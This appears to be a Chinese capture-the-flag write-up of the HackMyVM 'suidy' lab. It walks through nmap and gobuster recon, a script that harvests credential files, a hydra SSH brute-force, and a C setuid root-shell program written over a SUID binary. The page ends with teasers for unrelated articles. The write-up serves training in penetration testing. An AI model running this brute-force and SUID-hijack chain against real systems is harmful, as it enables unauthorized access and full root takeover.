HackMyVM-suidy

目录

信息收集

arp

nmap

WEB

web信息收集

gobuster

目录批量查看

hydra

ssh连接

提权

系统信息收集

提权


信息收集

arp
┌─[root@parrot]─[~/HackMyVM]
└──╼ #arp-scan -l
Interface: enp0s3, type: EN10MB, MAC: 08:00:27:16:3d:f8, IPv4: 192.168.9.115
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
---
192.168.9.120  08:00:27:34:fa:47  PCS Systemtechnik GmbH

6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.056 seconds (124.51 hosts/sec). 6 responded

nmap
端口信息收集

┌─[root@parrot]─[~/HackMyVM]
└──╼ #nmap -p- 192.168.9.120 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-17 08:52 GMT
Nmap scan report for 192.168.9.120
Host is up (0.00027s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:34:FA:47 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 3.94 seconds
服务版本信息收集

┌─[root@parrot]─[~/HackMyVM]
└──╼ #nmap -sC -sV -O -p 22,80 192.168.9.120 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-17 08:55 GMT
Nmap scan report for 192.168.9.120
Host is up (0.00047s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 8a:cb:7e:8a:72:82:84:9a:11:43:61:15:c1:e6:32:0b (RSA)
|   256 7a:0e:b6:dd:8f:ee:a7:70:d9:b1:b5:6e:44:8f:c0:49 (ECDSA)
|_  256 80:18:e6:c7:01:0e:c6:6d:7d:f4:d2:9f:c9:d0:6f:4c (ED25519)
80/tcp open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:34:FA:47 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.85 seconds


WEB

web信息收集


从猜测是robots.txt目录中找到源码中的隐藏目录,然后又得知 /shehatesme/ 目录藏着很多 txt 文件!

我们爆破一下!

gobuster
┌─[root@parrot]─[~/HackMyVM]
└──╼ #gobuster dir -u http://192.168.9.120/shehatesme/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.9.120/shehatesme/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/full.txt             (Status: 200) [Size: 16]
/search.txt           (Status: 200) [Size: 16]
/privacy.txt          (Status: 200) [Size: 16]
/about.txt            (Status: 200) [Size: 16]
/blog.txt             (Status: 200) [Size: 16]
/new.txt              (Status: 200) [Size: 16]
/page.txt             (Status: 200) [Size: 16]
/forums.txt           (Status: 200) [Size: 16]
/jobs.txt             (Status: 200) [Size: 16]
/other.txt            (Status: 200) [Size: 16]
/welcome.txt          (Status: 200) [Size: 16]
/admin.txt            (Status: 200) [Size: 16]
/faqs.txt             (Status: 200) [Size: 16]
/2001.txt             (Status: 200) [Size: 16]
/link.txt             (Status: 200) [Size: 16]
/space.txt            (Status: 200) [Size: 16]
/network.txt          (Status: 200) [Size: 16]
/google.txt           (Status: 200) [Size: 16]
/folder.txt           (Status: 200) [Size: 16]
/java.txt             (Status: 200) [Size: 16]
/issues.txt           (Status: 200) [Size: 16]
/guide.txt            (Status: 200) [Size: 16]
/art.txt              (Status: 200) [Size: 16]
/es.txt               (Status: 200) [Size: 16]
/smilies.txt          (Status: 200) [Size: 16]
/airport.txt          (Status: 200) [Size: 16]
/secret.txt           (Status: 200) [Size: 16]
/procps.txt           (Status: 200) [Size: 16]
/pynfo.txt            (Status: 200) [Size: 16]
/lh2.txt              (Status: 200) [Size: 16]
/muze.txt             (Status: 200) [Size: 16]
/alba.txt             (Status: 200) [Size: 16]
/cymru.txt            (Status: 200) [Size: 16]
/wha.txt              (Status: 200) [Size: 16]
Progress: 415286 / 415288 (100.00%)
===============================================================
Finished
===============================================================

通过访问查看,发现这个应该就是ssh登录的账号和密码!我们提取出来!!

目录批量查看
┌─[root@parrot]─[~/HackMyVM]
└──╼ #cat user_pass.txt | head -n 51 | tail -n 34 | awk '{print $1}'
/full.txt
/search.txt
/privacy.txt
/about.txt
/blog.txt
/new.txt
/page.txt
/forums.txt
/jobs.txt
/other.txt
/welcome.txt
/admin.txt
/faqs.txt
/2001.txt
/link.txt
/space.txt
/network.txt
/google.txt
/folder.txt
/java.txt
/issues.txt
/guide.txt
/art.txt
/es.txt
/smilies.txt
/airport.txt
/secret.txt
/procps.txt
/pynfo.txt
/lh2.txt
/muze.txt
/alba.txt
/cymru.txt
/wha.txt
┌─[root@parrot]─[~/HackMyVM]
└──╼ #cat user_pass.txt | head -n 51 | tail -n 34 | awk '{print $1}' > user_pass.list
┌─[root@parrot]─[~/HackMyVM]
└──╼ #sed 's|^|http://192.168.9.120/shehatesme|' user_pass.list > 1.txt
┌─[root@parrot]─[~/HackMyVM]
└──╼ #cat 1.txt 
http://192.168.9.120/shehatesme/full.txt
http://192.168.9.120/shehatesme/search.txt
http://192.168.9.120/shehatesme/privacy.txt
http://192.168.9.120/shehatesme/about.txt
http://192.168.9.120/shehatesme/blog.txt
http://192.168.9.120/shehatesme/new.txt
http://192.168.9.120/shehatesme/page.txt
http://192.168.9.120/shehatesme/forums.txt
http://192.168.9.120/shehatesme/jobs.txt
http://192.168.9.120/shehatesme/other.txt
http://192.168.9.120/shehatesme/welcome.txt
http://192.168.9.120/shehatesme/admin.txt
http://192.168.9.120/shehatesme/faqs.txt
http://192.168.9.120/shehatesme/2001.txt
http://192.168.9.120/shehatesme/link.txt
http://192.168.9.120/shehatesme/space.txt
http://192.168.9.120/shehatesme/network.txt
http://192.168.9.120/shehatesme/google.txt
http://192.168.9.120/shehatesme/folder.txt
http://192.168.9.120/shehatesme/java.txt
http://192.168.9.120/shehatesme/issues.txt
http://192.168.9.120/shehatesme/guide.txt
http://192.168.9.120/shehatesme/art.txt
http://192.168.9.120/shehatesme/es.txt
http://192.168.9.120/shehatesme/smilies.txt
http://192.168.9.120/shehatesme/airport.txt
http://192.168.9.120/shehatesme/secret.txt
http://192.168.9.120/shehatesme/procps.txt
http://192.168.9.120/shehatesme/pynfo.txt
http://192.168.9.120/shehatesme/lh2.txt
http://192.168.9.120/shehatesme/muze.txt
http://192.168.9.120/shehatesme/alba.txt
http://192.168.9.120/shehatesme/cymru.txt
http://192.168.9.120/shehatesme/wha.t

#!/bin/bash

# 输入文件,包含 URL 列表
input_file="url_list.txt"
# 输出文件,存储 curl 命令的响应内容
output_file="response_output.txt"

# 检查输入文件是否存在
if [ ! -f "$input_file" ]; then
    echo "错误:文件 $input_file 不存在。"
    exit 1
fi

# 逐行读取输入文件中的 URL 并使用 curl 获取响应内容
while IFS= read -r url
do
    # 执行 curl 命令并获取响应内容
    response=$(curl -s "$url")
    # 检查 curl 命令是否成功
    if [ $? -eq 0 ]; then
        # 将 URL 和响应内容追加到输出文件
        echo "URL: $url" >> "$output_file"
        echo "$response" >> "$output_file"
        echo "" >> "$output_file"
    else
        # 如果 curl 命令失败,输出错误信息
        echo "获取 $url 时发生错误。" >> "$output_file"
        echo "" >> "$output_file"
    fi
done < "$input_file"

# 完成消息
echo "所有 URL 的响应内容已保存到 $output_file 文件中。"
┌─[root@parrot]─[~/HackMyVM]
└──╼ #cat output.txt 
URL: http://192.168.9.120/shehatesme/full.txt
yuijhse/hjupnkk

URL: http://192.168.9.120/shehatesme/search.txt
jaime11/JKiufg6

URL: http://192.168.9.120/shehatesme/privacy.txt
jaime11/JKiufg6

URL: http://192.168.9.120/shehatesme/about.txt
jaime11/JKiufg6

URL: http://192.168.9.120/shehatesme/blog.txt
jaime11/JKiufg6

URL: http://192.168.9.120/shehatesme/new.txt
hidden1/passZZ!

URL: http://192.168.9.120/shehatesme/page.txt
jhfbvgt/iugbnvh

URL: http://192.168.9.120/shehatesme/forums.txt
john765/FDrhguy

URL: http://192.168.9.120/shehatesme/jobs.txt
maria11/jhfgyRf

URL: http://192.168.9.120/shehatesme/other.txt
jaime11/JKiufg6

URL: http://192.168.9.120/shehatesme/welcome.txt
jaime11/JKiufg6

URL: http://192.168.9.120/shehatesme/admin.txt
jaime11/JKiufg6

URL: http://192.168.9.120/shehatesme/faqs.txt
jaime11/JKiufg6

URL: http://192.168.9.120/shehatesme/2001.txt
jaime11/JKiufg6

URL: http://192.168.9.120/shehatesme/link.txt
jaime11/JKiufg6

URL: http://192.168.9.120/shehatesme/space.txt
jaime11/JKiufg6

URL: http://192.168.9.120/shehatesme/network.txt
mmnnbbv/iughtyr

URL: http://192.168.9.120/shehatesme/google.txt
jaime11/JKiufg6

URL: http://192.168.9.120/shehatesme/folder.txt
jaime11/JKiufg6

URL: http://192.168.9.120/shehatesme/java.txt
jaime11/JKiufg6

URL: http://192.168.9.120/shehatesme/issues.txt
jaime11/JKiufg6

URL: http://192.168.9.120/shehatesme/guide.txt
jaime11/JKiufg6

URL: http://192.168.9.120/shehatesme/art.txt
jaime11/JKiufg6

URL: http://192.168.9.120/shehatesme/es.txt
jaime11/JKiufg6

URL: http://192.168.9.120/shehatesme/smilies.txt
smileys/98GHbjh

URL: http://192.168.9.120/shehatesme/airport.txt
nhvjguy/kjhgyut

URL: http://192.168.9.120/shehatesme/secret.txt
jaime11/JKiufg6

URL: http://192.168.9.120/shehatesme/procps.txt
theuser/thepass

URL: http://192.168.9.120/shehatesme/pynfo.txt
jaime11/JKiufg6

URL: http://192.168.9.120/shehatesme/lh2.txt
jaime11/JKiufg6

URL: http://192.168.9.120/shehatesme/muze.txt
jaime11/JKiufg6

URL: http://192.168.9.120/shehatesme/alba.txt
jaime11/JKiufg6

URL: http://192.168.9.120/shehatesme/cymru.txt
jaime11/JKiufg6

URL: http://192.168.9.120/shehatesme/wha.txt
jaime11/JKiufg6
简单查看后,发现也就是几个用户,好多都是重复的!

yuijhse/hjupnkk
jaime11/JKiufg6
hidden1/passZZ!
jhfbvgt/iugbnvh
john765/FDrhguy
mmnnbbv/iughtyr
maria11/jhfgyRf
smileys/98GHbjh
nhvjguy/kjhgyut
theuser/thepass


hydra
爆破ssh吧!
┌─[root@parrot]─[~/HackMyVM]
└──╼ #cat 2.txt 
yuijhse/hjupnkk
jaime11/JKiufg6
hidden1/passZZ!
jhfbvgt/iugbnvh
john765/FDrhguy
mmnnbbv/iughtyr
maria11/jhfgyRf
smileys/98GHbjh
nhvjguy/kjhgyut
theuser/thepass

┌─[root@parrot]─[~/HackMyVM]
└──╼ #cat 2.txt | awk -F "/" '{print $1}' > user.txt
┌─[root@parrot]─[~/HackMyVM]
└──╼ #cat 2.txt | awk -F "/" '{print $2}' > pass.txt 

┌─[✗]─[root@parrot]─[~/HackMyVM]
└──╼ #hydra -L user.txt -P pass.txt ssh://192.168.9.120
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-17 10:29:09
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 100 login tries (l:10/p:10), ~7 tries per task
[DATA] attacking ssh://192.168.9.120:22/
[22][ssh] host: 192.168.9.120   login: theuser   password: thepass
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 4 final worker threads did not complete until end.
[ERROR] 4 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-04-17 10:29:32


ssh连接
┌─[✗]─[root@parrot]─[~/HackMyVM]
└──╼ #ssh theuser@192.168.9.120 
theuser@192.168.9.120's password: 
Linux suidy 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Apr 17 11:32:16 2024 from 192.168.9.115
theuser@suidy:~$ id
uid=1000(theuser) gid=1000(theuser) groups=1000(theuser),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

theuser@suidy:~$ ls
user.txt
theuser@suidy:~$ cat user.txt 
HMV2353IVI

得到user.txt

提权

系统信息收集
theuser@suidy:~$ find / -perm -u=s -type f 2>/dev/null
/home/suidy/suidyyyyy
/usr/bin/su
/usr/bin/umount
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/chsh
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device

theuser@suidy:/home/suidy$ ls
note.txt  suidyyyyy
theuser@suidy:/home/suidy$ ./suidyyyyy 
suidy@suidy:/home/suidy$ ls
note.txt  suidyyyyy
suidy@suidy:/home/suidy$ cat note.txt 
I love SUID files!
The best file is suidyyyyy because users can use it to feel as I feel.
root know it and run an script to be sure that my file has SUID. 
If you are "theuser" I hate you!

-suidy

要先执行一下 suidyyyyy 这个文件,才能查看 note.txt 文件!

当我们执行 suidyyyyy 这个文件时,我们就已经切换到了 suidy 用户!

suidy@suidy:/home/suidy$ ls -al suidyyyyy 
-rwsrwsr-x 1 root theuser 16704 Sep 26  2020 suidyyyyy
这个文件具有root权限!

提权
suidy@suidy:/home/suidy$ nano exp.c
Unable to create directory /home/theuser/.local/share/nano/: Permission denied
It is required for saving/loading search history or cursor positions.

Press Enter to continue

suidy@suidy:/home/suidy$ cat exp.c 
# include <stdio.h>
# include <unistd.h>

int main() {
    setuid(0);
    setgid(0);
    system("/bin/bash");
    
}

我打算直接替换这个 suidyyyyy 文件!

theuser@suidy:/home/suidy$ pwd
/home/suidy

theuser@suidy:/home/suidy$ cd /tmp
theuser@suidy:/tmp$ cp /home/suidy/exp.c .
theuser@suidy:/tmp$ ls
exp.c  systemd-private-e24681540c8d4d4abf3f7713d0124638-systemd-timesyncd.service-Egz94r

theuser@suidy:/tmp$ gcc exp.c -o suidyyyyy
exp.c: In function ‘main’:
exp.c:7:5: warning: implicit declaration of function ‘system’ [-Wimplicit-function-declaration]
     system("/bin/bash");
     ^~~~~~
     
theuser@suidy:/tmp$ cp suidyyyyy /home/suidy/suidyyyyy
theuser@suidy:/tmp$ cd /home/suidy/
theuser@suidy:/home/suidy$ ls
exp.c  note.txt  suidyyyyy
theuser@suidy:/home/suidy$ ./suidyyyyy 
root@suidy:/home/suidy# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(theuser)


本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/554444.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

【网络通信基础】网络中的常见基本概念

目录 一、IP地址 二、端口号 三、协议 四、五元组 五、协议分层 1. OSI 模型 2. TCP/CP五层&#xff08;或四层&#xff09;模型 3. 网络设备所在分层 六、封装和分用 封装&#xff08;Encapsulation&#xff09; 分用&#xff08;Multiplexing&#xff09; 一、IP…

多目标环形粒子群算法和多目标遗传算法跑MOCEC2020(24个多目标测试函数,matlab代码,多个评价指标)

本号从现在起可以定制使用评估次数改进单目标群体算法&#xff0c;需要的私&#xff0c;价格贵&#xff0c;质量高。 目录&#xff1a; 一、多目标环形粒子群算法MO_Ring_PSO_SCD 二、多目标遗传算法NSGAII 三、MOCEC2020的24个多目标测试函数 四、实验结果 五、代码获取…

C语言进阶课程学习记录-函数指针的阅读

C语言进阶课程学习记录-函数指针的阅读 5个标识符含义解析技巧 本文学习自狄泰软件学院 唐佐林老师的 C语言进阶课程&#xff0c;图片全部来源于课程PPT&#xff0c;仅用于个人学习记录 5个标识符含义解析 int (*p1) (int* , int (*f) ( int* ) );定义了指针p1,指向函数&#…

javaWeb智能医疗管理系统

简介 在当今快节奏的生活中&#xff0c;智能医疗系统的崛起为医疗行业带来了一场革命性的变革。基于JavaWeb技术开发的智能医疗管理系统&#xff0c;不仅为医疗机构提供了高效、精准的管理工具&#xff0c;也为患者提供了更便捷、更个性化的医疗服务。本文将介绍一个基于SSM&a…

树莓集团产业生态建设之特色产业服务:人才项目转化中心

树莓集团在产业生态建设中&#xff0c;积极输出特色产业服务——人才项目转化中心。该中心依托数字产业园致力于推动创新创业工作&#xff0c;通过链接产业人才聚集地与树莓认证的导师库体系&#xff0c;为人才及相关课题项目提供全方位的服务。 树莓集团人才项目转化中心以人…

Python学习(四)文件操作

文件操作 想想我们平常对文件的基本操作&#xff0c;大概可以分为三个步骤(简称文件操作三步走): ① 打开文件 ② 读写文件 ③ 关闭文件 注意:可以只打开和关闭文件&#xff0c;不进行任何读写 在Python&#xff0c;使用open函数&#xff0c;可以打开一个已经存在的文件&…

IP爬虫代理服务器是什么以及为什么使用爬虫代理?

在网络抓取领域&#xff0c;爬虫代理发挥着关键作用。 但它们到底是什么&#xff1f; 从本质上讲&#xff0c;爬虫代理是位于网络抓取工具和目标网站之间的中间服务器。 该中间服务器充当盾牌&#xff0c;提供匿名性&#xff0c;并允许您访问网站并提取数据&#xff0c;而无需透…

IDEA配置Maven环境

黑马程序员JavaWeb开发教程 文章目录 如果当前有已经打开项目的话&#xff0c;File -> Close Project 到以下页面之后选择 Customize -> All settings… 配置maven的安装目录&#xff0c;maven的配置文件&#xff0c;maven的本地仓库&#xff08;修改完成之后一定要先…

mybatis进阶篇-执行CRUD操作-typeAliases别名-接口绑定

目录结构 所需jar包 https://download.csdn.net/download/weixin_44201223/89160447?spm1003.2166.3001.6637.1 1.创建数据表&#xff08;book&#xff09; # 创建book表 create table book(id int auto_increment primary key,name varchar(255) ,price double ,num int )…

Linux OpenSSH最新版9.7p1升级操作详细教程

原创声明&#xff1a;非本人许可&#xff0c;谢绝转载&#xff01; 1.背景说明 前几天与朋友闲聊中得知他朋友圈有服务器因OpenSSH漏洞遭受攻击的事情&#xff0c;OpenSSH重要性这里就不废话了&#xff0c;在网上一查&#xff0c;公布的漏洞还真不少&#xff0c;其中还有不少…

RK3588平台开发系列讲解(PCIe开发篇2)

根据原理图填写DTS 原理图是基于IO信号的视⻆来描述硬件&#xff0c;IO信号是跟PHY的index强相关的&#xff0c;前⾯提到RK3588的controller和PHY的index可能不⼀致&#xff0c;所以看原理图的时候需要特别注意这⼀点。这⾥给出⼀些填写建议&#xff0c;并通过⽰例说明如何将原…

socket通信基础讲解及示例-C

socket通信之C篇 服务端与客户端简介 socket通信服务端与客户端通信模型通信实战server&#xff08;服务端&#xff09;创建client&#xff08;客户端&#xff09;创建 函数详解创建套接字 socket绑定端口bind进入监听状态listen获取客户端连接请求accept接收网络数据read发送数…

音素与视素(Viseme)

什么是视素&#xff08;视位&#xff09; 音素(Phoneme)&#xff0c;是人类语言中能够区别意义的最小声音单位。视素(Viseme)&#xff0c;是指与某一音素相对应的嘴、舌头、下腭等可视发音器官所处的状态。Viseme是MPEG-4 标准提出来的概念。 有时Viseme也翻译为视位。下面会…

JavaEE初阶Day 10:多线程(8)

目录 Day 10&#xff1a;多线程&#xff08;8&#xff09;单例模式阻塞队列1. 生产者消费者模型1.1 生产者消费者模型解耦合1.2 生产者消费者模型削峰填谷 2. 生产者消费者代码3. 阻塞队列实现 Day 10&#xff1a;多线程&#xff08;8&#xff09; 单例模式 单例模式&#xf…

springboot中mongodb连接池配置-源码分析

yml下spring.data.mongodb 以前mysql等在spring.xxx下配置&#xff0c;现在springboot新版本&#xff08;小编3.2.3&#xff09;在spring.data.xxx下了&#xff0c;如下所示&#xff0c;mongodb的配置在spring.data.mongodb下&#xff1a; 连接池相关参数配置-源码分析 拼接在…

vue3 删除对象中的属性,可以使用js里的delete,但需注意ts定义对象类型!

如上如&#xff0c;当使用delete 删除stateData中的属性时&#xff0c; 报错&#xff0c;意思为 TypeScript 错误“‘delete’ 运算符的操作数必须是可选的 什么原因呢&#xff1f;是因为我偷懒 缺少了ts定义类型 方法一&#xff1a; &#xff08;不推荐&#xff09; delete …

【网络安全 | 信息收集】JS文件信息收集工具LinkFinder安装使用教程

文章目录 前言安装教程使用教程 前言 JavaScript文件可能会泄露敏感信息&#xff0c;如注释中的机密信息、内部IP地址&#xff0c;以及包含未授权访问或其他漏洞的URL。手动检查这些信息效率低下&#xff0c;而该工具——LinkFinder&#xff0c;可用于自动收集JavaScript文件中…

Windows10系统中忘记MySQL数据库root权限登录密码

本文档所使用的MySQL版本为MySQL5.7>> mysqld_safe --skip-grant-tables&mysql -u root mysql在命令行中使用上面的命令登录MySQL&#xff0c;其中--skip-grant-tables允许用户跳过权限表进行无密码登录 >> UPDATE user SET authentication_stringPASSWORD(&q…

2024 年 Web 前端开发趋势

希腊哲学家赫拉克利特认为&#xff0c;变化是生命中唯一不变的东西。这句话适用于我们的个人生活、行业和职业领域。 尤其是前端开发领域&#xff0c;新技术、开发趋势、库和框架不断涌现&#xff0c;变化并不陌生。最近发生的一些事件正在改变开发人员构建网站和 Web 应用的方…

buuctf之ciscn_2019_c_1

ciscn_2019_c_1 一、查看属性二、静态分析三、动态分析四、思路五、exp 一、查看属性 首先还是必要的查看属性环节&#xff1a; 可以知道该文件是一个x86架构下的64位小端ELF文件&#xff0c;开启了栈不可执行&#xff08;NX&#xff09; 执行一下&#xff0c;先有一个选择&…